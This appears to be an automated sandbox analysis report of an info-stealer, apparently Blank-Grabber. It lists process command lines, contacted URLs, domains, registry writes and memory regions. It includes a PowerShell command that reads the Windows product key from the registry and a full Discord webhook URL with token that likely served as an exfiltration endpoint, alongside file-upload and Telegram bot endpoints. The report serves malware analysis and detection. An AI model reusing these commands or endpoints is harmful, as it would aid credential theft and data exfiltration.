wmic path win32_VideoController get name
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform'
-Name BackupProductKeyDefault"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name
BackupProductKeyDefault
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA5B5.tmp"
"c:\Users\user\AppData\Local\Temp\5yc1e5ua\CSC1A0C8093F81540D8AC446D71F7EBBA56.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 89 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://discord.com/api/webhooks/1240380657666887700/TnMjALQrWBxb3bTdzbRJ91Rss2Poryr8-psQe2X-8dMlc0OpBQe43uFEdbnzOA4LZ5Gk
|
162.159.138.232
|
||
https://discord.com/api/webhooks/1240380657666887700/TnMjALQrWBxb3bTdzbRJ91Rss2Poryr8-psQe2X-8dMlc0O
|
unknown
|
||
http://ns.adobe.hotosh
|
unknown
|
||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
https://github.com/Blank-c/BlankOBF
|
unknown
|
||
https://www.avito.ru/
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
https://api.gofile.io/getServerrzr
|
unknown
|
||
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
https://github.com/Blank-c/Blank-Grabberi
|
unknown
|
||
http://cacerts.digi/0
|
unknown
|
||
https://www.ctrip.com/
|
unknown
|
||
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
|
unknown
|
||
https://github.com/Blank-c/Blank-Grabberr
|
unknown
|
||
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
|
unknown
|
||
https://www.leboncoin.fr/
|
unknown
|
||
https://tools.ietf.org/html/rfc2388#section-4.4
|
unknown
|
||
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
|
unknown
|
||
https://weibo.com/
|
unknown
|
||
https://api.anonfiles.com/upload
|
unknown
|
||
https://www.msn.com
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://discord.com/api/v9/users/
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
|
unknown
|
||
http://cacerts.digi
|
unknown
|
||
https://peps.python.org/pep-0205/
|
unknown
|
||
https://www.reddit.com/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://www.amazon.ca/
|
unknown
|
||
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
|
unknown
|
||
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
|
unknown
|
||
https://www.ebay.co.uk/
|
unknown
|
||
https://support.microsoft
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
https://www.ebay.de/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
|
unknown
|
||
https://www.amazon.com/
|
unknown
|
||
https://github.com/python/cpython/issues/86361.
|
unknown
|
||
http://crl.mic
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
https://httpbin.org/
|
unknown
|
||
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
|
unknown
|
||
http://www.microsoftISPLA~1.PNGy./
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://www.youtube.com/
|
unknown
|
||
https://allegro.pl/
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.g
|
unknown
|
||
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
|
unknown
|
||
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
|
unknown
|
||
https://MD8.mozilla.org/1/m
|
unknown
|
||
http://ocsp.sectigo.com0$
|
unknown
|
||
https://www.python.org/psf/license/
|
unknown
|
||
http://ip-api.com/line/?fields=hostingrzr
|
unknown
|
||
https://www.bbc.co.uk/
|
unknown
|
||
https://bugzilla.mo
|
unknown
|
||
https://api.anonfiles.com/uploadr
|
unknown
|
||
http://tools.ietf.org/html/rfc6125#section-6.4.3
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://google.com/mail
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
|
unknown
|
||
https://www.python.org/psf/license/)
|
unknown
|
||
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
|
unknown
|
||
https://www.google.com/
|
unknown
|
||
https://www.iqiyi.com/
|
unknown
|
||
https://foss.heptapod.net/pypy/pypy/-/issues/3539
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
|
unknown
|
||
http://google.com/
|
unknown
|
||
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
|
unknown
|
||
http://ns.a.0/sTy
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
https://tools.ietf.org/html/rfc7231#section-4.3.6)
|
unknown
|
||
https://www.python.org/download/releases/2.3/mro/.
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://discordapp.com/api/v9/users/
|
unknown
|
||
http://ip-api.com/json/?fields=225545r
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2920
|
unknown
|
||
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
|
unknown
|
||
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
|
unknown
|
||
https://yahoo.com/
|
unknown
|
||
https://account.bellmedia.c
|
unknown
|
||
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
|
unknown
|
||
https://login.microsoftonline.com
|
unknown
|
||
http://cacerts.digicert.co
|
unknown
|
||
http://crl.thawte.com/ThawteTimestampingCA.crl0
|
unknown
|
||
https://html.spec.whatwg.org/multipage/
|
unknown
|
||
https://www.ifeng.com/
|
unknown
|
||
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
|
unknown
|
||
https://www.zhihu.com/
|
unknown
|
||
http://www.microsoftDATABA~1.DB-y.
|
unknown
|
||
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
discord.com
|
162.159.138.232
|
||
ip-api.com
|
208.95.112.1
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
162.159.138.232
|
discord.com
|
United States
|
||
208.95.112.1
|
ip-api.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
|
1280x1024x32(BGR 0)
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
|
@%SystemRoot%\system32\mlang.dll,-4387
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
|
@%SystemRoot%\system32\mlang.dll,-4407
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1B7EC930000
|
direct allocation
|
page read and write
|
||
1D726AE9000
|
heap
|
page read and write
|
||
1B7ECF62000
|
heap
|
page read and write
|
||
1B7EC7E8000
|
heap
|
page read and write
|
||
1B7ECBEA000
|
heap
|
page read and write
|
||
1D726AEB000
|
heap
|
page read and write
|
||
1B7ECBEB000
|
heap
|
page read and write
|
||
1B7ECBEA000
|
heap
|
page read and write
|
||
1B7ED4A3000
|
heap
|
page read and write
|
||
1B7ECBEA000
|
heap
|
page read and write
|
||
1FA18EBB000
|
heap
|
page read and write
|
||
1B7ECB53000
|
heap
|
page read and write
|
||
1CE8C9AF000
|
heap
|
page read and write
|
||
30AADFF000
|
unkown
|
page read and write
|
||
1F8A3DB0000
|
heap
|
page read and write
|
||
1B7ECD0F000
|
heap
|
page read and write
|
||
19D36070000
|
heap
|
page read and write
|
||
27A2CFC000
|
stack
|
page read and write
|
||
1B7ECD0A000
|
heap
|
page read and write
|
||
1BEA7C90000
|
heap
|
page read and write
|
||
160A4A0C000
|
heap
|
page read and write
|
||
13A07120000
|
heap
|
page read and write
|
||
1FA18EBB000
|
heap
|
page read and write
|
||
160A4409000
|
heap
|
page read and write
|
||
290E5A45000
|
heap
|
page read and write
|
||
25A153A2000
|
heap
|
page read and write
|
||
15EDF17A000
|
heap
|
page read and write
|
||
25A15385000
|
heap
|
page read and write
|
||
202AC1AB000
|
heap
|
page read and write
|
||
19D36110000
|
trusted library allocation
|
page read and write
|
||
7FF7E2FDE000
|
unkown
|
page readonly
|
||
19D366C2000
|
heap
|
page read and write
|
||
1F5213F0000
|
heap
|
page read and write
|
||
22AA594A000
|
heap
|
page read and write
|
||
19D36698000
|
heap
|
page read and write
|
||
22AA5A39000
|
heap
|
page read and write
|
||
1CE8FAC3000
|
heap
|
page read and write
|
||
1B7EC760000
|
heap
|
page read and write
|
||
7FFE1A450000
|
unkown
|
page readonly
|
||
807FFF000
|
unkown
|
page read and write
|
||
19D3669C000
|
heap
|
page read and write
|
||
1CE8C974000
|
heap
|
page read and write
|
||
1B7EC69B000
|
heap
|
page read and write
|
||
1FA18E8F000
|
heap
|
page read and write
|
||
185A443F000
|
trusted library allocation
|
page read and write
|
||
1B7ECB67000
|
heap
|
page read and write
|
||
160A4A09000
|
heap
|
page read and write
|
||
1B7EC368000
|
heap
|
page read and write
|
||
A7A9FAF000
|
stack
|
page read and write
|
||
1B7ECCEA000
|
heap
|
page read and write
|
||
19D36110000
|
trusted library allocation
|
page read and write
|
||
7FFD9AB80000
|
trusted library allocation
|
page execute and read and write
|
||
1F397B5D000
|
heap
|
page read and write
|
||
160A4438000
|
heap
|
page read and write
|
||
1B7ECE31000
|
heap
|
page read and write
|
||
19D37F31000
|
heap
|
page read and write
|
||
1B7ECCE3000
|
heap
|
page read and write
|
||
2A1CD8F000
|
stack
|
page read and write
|
||
202AC19F000
|
heap
|
page read and write
|
||
1B7ECCCD000
|
heap
|
page read and write
|
||
1EAC1CA0000
|
heap
|
page read and write
|
||
1B7EC78C000
|
heap
|
page read and write
|
||
22CC0F79000
|
heap
|
page read and write
|
||
1EAC1D09000
|
heap
|
page read and write
|
||
161FEF61000
|
heap
|
page read and write
|
||
25A153A9000
|
heap
|
page read and write
|
||
1E0FD110000
|
heap
|
page read and write
|
||
1B7ECC80000
|
heap
|
page read and write
|
||
18A40240000
|
heap
|
page read and write
|
||
1CA2FDF1000
|
trusted library allocation
|
page read and write
|
||
185A2500000
|
heap
|
page read and write
|
||
1B7ECB32000
|
heap
|
page read and write
|
||
1F8A3CA7000
|
heap
|
page read and write
|
||
1CE8C959000
|
heap
|
page read and write
|
||
160A43BB000
|
heap
|
page read and write
|
||
1E080610000
|
direct allocation
|
page read and write
|
||
7FF7E2FC4000
|
unkown
|
page read and write
|
||
1B7ECD47000
|
heap
|
page read and write
|
||
1BF9D1A0000
|
heap
|
page read and write
|
||
1B7ECE28000
|
heap
|
page read and write
|
||
194D7600000
|
heap
|
page read and write
|
||
1A2AB165000
|
heap
|
page read and write
|
||
1E0FD004000
|
heap
|
page read and write
|
||
1B7ECD47000
|
heap
|
page read and write
|
||
1B7EDD70000
|
direct allocation
|
page read and write
|
||
1D726AE6000
|
heap
|
page read and write
|
||
7FFE11539000
|
unkown
|
page execute and read and write
|
||
1BF9D2DC000
|
heap
|
page read and write
|
||
25A14BE1000
|
heap
|
page read and write
|
||
160A4433000
|
heap
|
page read and write
|
||
1F23DF5D000
|
heap
|
page read and write
|
||
202AC62F000
|
heap
|
page read and write
|
||
25A14BB2000
|
heap
|
page read and write
|
||
7FF7E2F30000
|
unkown
|
page readonly
|
||
160A43A1000
|
heap
|
page read and write
|
||
194D7644000
|
heap
|
page read and write
|
||
41742FC000
|
stack
|
page read and write
|
||
160A49F8000
|
heap
|
page read and write
|
||
1F4256C7000
|
heap
|
page read and write
|
||
2BAFE1E0000
|
heap
|
page read and write
|
||
202AC149000
|
heap
|
page read and write
|
||
62332FE000
|
stack
|
page read and write
|
||
955CBFF000
|
stack
|
page read and write
|
||
955CAFF000
|
stack
|
page read and write
|
||
837F1BE000
|
stack
|
page read and write
|
||
202AC1BE000
|
heap
|
page read and write
|
||
1B7ED0A1000
|
heap
|
page read and write
|
||
1FA18E97000
|
heap
|
page read and write
|
||
25A14BC4000
|
heap
|
page read and write
|
||
20C32F55000
|
heap
|
page read and write
|
||
1E0FD090000
|
heap
|
page read and write
|
||
24C8F0DA000
|
heap
|
page read and write
|
||
6AC90F9000
|
stack
|
page read and write
|
||
1CA1E274000
|
heap
|
page read and write
|
||
1B7EC368000
|
heap
|
page read and write
|
||
19D3606A000
|
heap
|
page read and write
|
||
202ABFE0000
|
heap
|
page read and write
|
||
19D36010000
|
heap
|
page read and write
|
||
22AA59E0000
|
heap
|
page read and write
|
||
1B7ED486000
|
heap
|
page read and write
|
||
C53ECFB000
|
stack
|
page read and write
|
||
1B7EC75F000
|
heap
|
page read and write
|
||
7FFD9AB60000
|
trusted library allocation
|
page execute and read and write
|
||
39992FF000
|
stack
|
page read and write
|
||
1AABE35A000
|
heap
|
page read and write
|
||
B97ED8F000
|
stack
|
page read and write
|
||
7FFDFF2E8000
|
unkown
|
page execute and read and write
|
||
1B7EC6B9000
|
heap
|
page read and write
|
||
1F23DF50000
|
heap
|
page read and write
|
||
1B7ECCDD000
|
heap
|
page read and write
|
||
25A1537C000
|
heap
|
page read and write
|
||
160A6294000
|
heap
|
page read and write
|
||
C4772FE000
|
unkown
|
page read and write
|
||
D6CC1FF000
|
unkown
|
page read and write
|
||
1EAC1D11000
|
heap
|
page read and write
|
||
1B7ECD31000
|
heap
|
page read and write
|
||
7FFD9ADF0000
|
trusted library allocation
|
page read and write
|
||
1B7ECC0B000
|
heap
|
page read and write
|
||
2BAFE08D000
|
heap
|
page read and write
|
||
7FF7ADE93000
|
unkown
|
page readonly
|
||
7FFDFB199000
|
unkown
|
page execute and read and write
|
||
185A4E36000
|
trusted library allocation
|
page read and write
|
||
7FFE1A47B000
|
unkown
|
page execute and read and write
|
||
22CC0F46000
|
heap
|
page read and write
|
||
1B7ED49F000
|
heap
|
page read and write
|
||
25A14BA4000
|
heap
|
page read and write
|
||
194D7666000
|
heap
|
page read and write
|
||
1B7EC75C000
|
heap
|
page read and write
|
||
185B425C000
|
trusted library allocation
|
page read and write
|
||
1B7ECC61000
|
heap
|
page read and write
|
||
160A4210000
|
heap
|
page read and write
|
||
1B7ED377000
|
heap
|
page read and write
|
||
1B7ED97C000
|
direct allocation
|
page read and write
|
||
25A14BCD000
|
heap
|
page read and write
|
||
7FFD9ACE9000
|
trusted library allocation
|
page read and write
|
||
185A4CB2000
|
trusted library allocation
|
page read and write
|
||
194D7662000
|
heap
|
page read and write
|
||
1B7EC530000
|
direct allocation
|
page read and write
|
||
1B7ECC76000
|
heap
|
page read and write
|
||
19D366A8000
|
heap
|
page read and write
|
||
1B7ECDED000
|
heap
|
page read and write
|
||
1B7ECD19000
|
heap
|
page read and write
|
||
252A3D10000
|
heap
|
page read and write
|
||
1CE90514000
|
heap
|
page read and write
|
||
1E0FD0BE000
|
heap
|
page read and write
|
||
7FFD9AB74000
|
trusted library allocation
|
page read and write
|
||
7FFD9AE10000
|
trusted library allocation
|
page read and write
|
||
1E0FFEF0000
|
direct allocation
|
page read and write
|
||
22AA5960000
|
heap
|
page read and write
|
||
1B7ECDF2000
|
heap
|
page read and write
|
||
160A49E0000
|
heap
|
page read and write
|
||
161FEF00000
|
heap
|
page read and write
|
||
1BEA7B40000
|
heap
|
page read and write
|
||
7FFDFACA1000
|
unkown
|
page execute and read and write
|
||
185A4CD9000
|
trusted library allocation
|
page read and write
|
||
202AC169000
|
heap
|
page read and write
|
||
1CA2FE6A000
|
trusted library allocation
|
page read and write
|
||
20C32F88000
|
heap
|
page read and write
|
||
1B7EC1B0000
|
direct allocation
|
page read and write
|
||
1F42569E000
|
heap
|
page read and write
|
||
1B7ECD41000
|
heap
|
page read and write
|
||
1CE8FA01000
|
heap
|
page read and write
|
||
1AABE540000
|
heap
|
page read and write
|
||
202AC1B0000
|
heap
|
page read and write
|
||
1B7ECB20000
|
heap
|
page read and write
|
||
1E0FD0E6000
|
heap
|
page read and write
|
||
1CE8FA99000
|
heap
|
page read and write
|
||
28937C4B000
|
heap
|
page read and write
|
||
7FFD9A992000
|
trusted library allocation
|
page read and write
|
||
7FFD9ACF0000
|
trusted library allocation
|
page read and write
|
||
20C32F5B000
|
heap
|
page read and write
|
||
19A85D60000
|
heap
|
page read and write
|
||
1B7ECEC1000
|
heap
|
page read and write
|
||
185A3EA0000
|
trusted library allocation
|
page read and write
|
||
1B7ECD08000
|
heap
|
page read and write
|
||
1F425699000
|
heap
|
page read and write
|
||
41743FE000
|
unkown
|
page read and write
|
||
185A5D94000
|
trusted library allocation
|
page read and write
|
||
202AC644000
|
heap
|
page read and write
|
||
1BEA7CB1000
|
heap
|
page read and write
|
||
1CE8C97D000
|
heap
|
page read and write
|
||
1B7ECD3D000
|
heap
|
page read and write
|
||
19D36061000
|
heap
|
page read and write
|
||
1B7EC1B0000
|
direct allocation
|
page read and write
|
||
1B7ECD31000
|
heap
|
page read and write
|
||
1E0FD0D8000
|
heap
|
page read and write
|
||
1D726AE6000
|
heap
|
page read and write
|
||
160A4433000
|
heap
|
page read and write
|
||
1B7ED9F8000
|
direct allocation
|
page read and write
|
||
1E0FD0E6000
|
heap
|
page read and write
|
||
1E080719000
|
direct allocation
|
page read and write
|
||
2245E7D0000
|
heap
|
page read and write
|
||
1CE8C9B3000
|
heap
|
page read and write
|
||
1B7EA830000
|
direct allocation
|
page read and write
|
||
7FFD9ABC0000
|
trusted library allocation
|
page read and write
|
||
202AC100000
|
trusted library allocation
|
page read and write
|
||
1B7ECC97000
|
heap
|
page read and write
|
||
160A4401000
|
heap
|
page read and write
|
||
1B7EC1A0000
|
direct allocation
|
page read and write
|
||
1E0FD137000
|
heap
|
page read and write
|
||
25A14E17000
|
heap
|
page read and write
|
||
1F521590000
|
heap
|
page read and write
|
||
1B7ED974000
|
direct allocation
|
page read and write
|
||
1B7ECD11000
|
heap
|
page read and write
|
||
7FFDFB19F000
|
unkown
|
page execute and write copy
|
||
1D807501000
|
heap
|
page read and write
|
||
160A4377000
|
heap
|
page read and write
|
||
7FFD9A9A0000
|
trusted library allocation
|
page read and write
|
||
202AC158000
|
heap
|
page read and write
|
||
19D36083000
|
heap
|
page read and write
|
||
20C32F8B000
|
heap
|
page read and write
|
||
202AE021000
|
heap
|
page read and write
|
||
2AD315C0000
|
heap
|
page read and write
|
||
1B7ECADD000
|
heap
|
page read and write
|
||
1B7ECE5D000
|
heap
|
page read and write
|
||
160A43C2000
|
heap
|
page read and write
|
||
19D36051000
|
heap
|
page read and write
|
||
13A07140000
|
heap
|
page read and write
|
||
2A1D07F000
|
stack
|
page read and write
|
||
7FFDFB89B000
|
unkown
|
page read and write
|
||
1B7EC6BE000
|
heap
|
page read and write
|
||
1BEA7CB1000
|
heap
|
page read and write
|
||
2B6D5FF000
|
stack
|
page read and write
|
||
1B7EDA08000
|
direct allocation
|
page read and write
|
||
1CE8E326000
|
heap
|
page read and write
|
||
7FFE1A47C000
|
unkown
|
page execute and write copy
|
||
2739F6F5000
|
heap
|
page read and write
|
||
955CC7F000
|
stack
|
page read and write
|
||
70C17FF000
|
unkown
|
page read and write
|
||
25A16D04000
|
heap
|
page read and write
|
||
1B7EC344000
|
heap
|
page read and write
|
||
30AACFC000
|
stack
|
page read and write
|
||
19A85CE0000
|
heap
|
page read and write
|
||
25A14BA4000
|
heap
|
page read and write
|
||
22CC0F20000
|
heap
|
page read and write
|
||
19D36051000
|
heap
|
page read and write
|
||
7FFD9AB90000
|
trusted library allocation
|
page read and write
|
||
1F4256B7000
|
heap
|
page read and write
|
||
22AA5A0B000
|
heap
|
page read and write
|
||
1B7EC6C5000
|
heap
|
page read and write
|
||
160A4A0F000
|
heap
|
page read and write
|
||
7FFDFAD37000
|
unkown
|
page execute and read and write
|
||
1B7EC38D000
|
heap
|
page read and write
|
||
7FFD9A9B0000
|
trusted library allocation
|
page read and write
|
||
1B7ED490000
|
heap
|
page read and write
|
||
1FA18EBB000
|
heap
|
page read and write
|
||
202AE02D000
|
heap
|
page read and write
|
||
1B7ECE1C000
|
heap
|
page read and write
|
||
15EDF380000
|
heap
|
page read and write
|
||
1B7ECE8F000
|
heap
|
page read and write
|
||
25A14E15000
|
heap
|
page read and write
|
||
1B7ECF48000
|
heap
|
page read and write
|
||
1B7ECE73000
|
heap
|
page read and write
|
||
7FFE11542000
|
unkown
|
page read and write
|
||
1B7EC760000
|
heap
|
page read and write
|
||
25A15399000
|
heap
|
page read and write
|
||
1B7EC6CA000
|
heap
|
page read and write
|
||
1CE8FAF5000
|
heap
|
page read and write
|
||
14233810000
|
heap
|
page read and write
|
||
1B7EC75C000
|
heap
|
page read and write
|
||
290E5A58000
|
heap
|
page read and write
|
||
7FFE13393000
|
unkown
|
page read and write
|
||
1E0806D0000
|
direct allocation
|
page read and write
|
||
1B7EC7CA000
|
heap
|
page read and write
|
||
160A43E2000
|
heap
|
page read and write
|
||
1CA1FE71000
|
trusted library allocation
|
page read and write
|
||
7FFE003A0000
|
unkown
|
page readonly
|
||
1B7ED4A9000
|
heap
|
page read and write
|
||
185A2587000
|
heap
|
page read and write
|
||
19D35FFE000
|
heap
|
page read and write
|
||
7FFE13381000
|
unkown
|
page execute and read and write
|
||
1B7ED1BC000
|
heap
|
page read and write
|
||
160A628E000
|
heap
|
page read and write
|
||
25A1538B000
|
heap
|
page read and write
|
||
185BC801000
|
heap
|
page read and write
|
||
1B7EDE10000
|
direct allocation
|
page read and write
|
||
7FFD9AC20000
|
trusted library allocation
|
page read and write
|
||
C4773FF000
|
stack
|
page read and write
|
||
1B7ED0D6000
|
heap
|
page read and write
|
||
1CE8FAB5000
|
heap
|
page read and write
|
||
1F4256AB000
|
heap
|
page read and write
|
||
2A1D3F7000
|
stack
|
page read and write
|
||
1CA2001A000
|
trusted library allocation
|
page read and write
|
||
26C3DA10000
|
heap
|
page read and write
|
||
1B7EC760000
|
heap
|
page read and write
|
||
1B7EC640000
|
heap
|
page read and write
|
||
1B7ECE8F000
|
heap
|
page read and write
|
||
1B7EE1C0000
|
direct allocation
|
page read and write
|
||
1B7ECC97000
|
heap
|
page read and write
|
||
23C91350000
|
heap
|
page read and write
|
||
1B7ECDE0000
|
heap
|
page read and write
|
||
1BF9D2DC000
|
heap
|
page read and write
|
||
160A4398000
|
heap
|
page read and write
|
||
1BF9D2F2000
|
heap
|
page read and write
|
||
1B7EC760000
|
heap
|
page read and write
|
||
1FF5A5F0000
|
heap
|
page read and write
|
||
1BF9D0C0000
|
heap
|
page read and write
|
||
1B7ECCDD000
|
heap
|
page read and write
|
||
1B7EC6AD000
|
heap
|
page read and write
|
||
268F4EF2000
|
heap
|
page read and write
|
||
1B7ECC94000
|
heap
|
page read and write
|
||
1E080630000
|
direct allocation
|
page read and write
|
||
1B7ECD08000
|
heap
|
page read and write
|
||
160A4372000
|
heap
|
page read and write
|
||
1B7EC30F000
|
heap
|
page read and write
|
||
160A4A0F000
|
heap
|
page read and write
|
||
7FFD9AD00000
|
trusted library allocation
|
page read and write
|
||
1CA382E9000
|
heap
|
page read and write
|
||
185BC482000
|
heap
|
page read and write
|
||
7DF452E00000
|
trusted library allocation
|
page execute and read and write
|
||
1CA37E20000
|
trusted library allocation
|
page read and write
|
||
202AC1A7000
|
heap
|
page read and write
|
||
7FFE1A459000
|
unkown
|
page execute and read and write
|
||
1B7ED0E8000
|
heap
|
page read and write
|
||
7FF7ADE51000
|
unkown
|
page execute read
|
||
160A49D0000
|
heap
|
page read and write
|
||
1CE8FADD000
|
heap
|
page read and write
|
||
7FFD9AD80000
|
trusted library allocation
|
page read and write
|
||
6AC8B1F000
|
stack
|
page read and write
|
||
22E56B30000
|
heap
|
page read and write
|
||
1B7EC6BE000
|
heap
|
page read and write
|
||
25A14BD9000
|
heap
|
page read and write
|
||
26C3DB55000
|
heap
|
page read and write
|
||
7E8A93C000
|
stack
|
page read and write
|
||
22AA7970000
|
heap
|
page read and write
|
||
25A14BA6000
|
heap
|
page read and write
|
||
22AA59FE000
|
heap
|
page read and write
|
||
20C32F89000
|
heap
|
page read and write
|
||
20C32F38000
|
heap
|
page read and write
|
||
25A14BA4000
|
heap
|
page read and write
|
||
1F8A3CB0000
|
heap
|
page read and write
|
||
19D36061000
|
heap
|
page read and write
|
||
22AA59F2000
|
heap
|
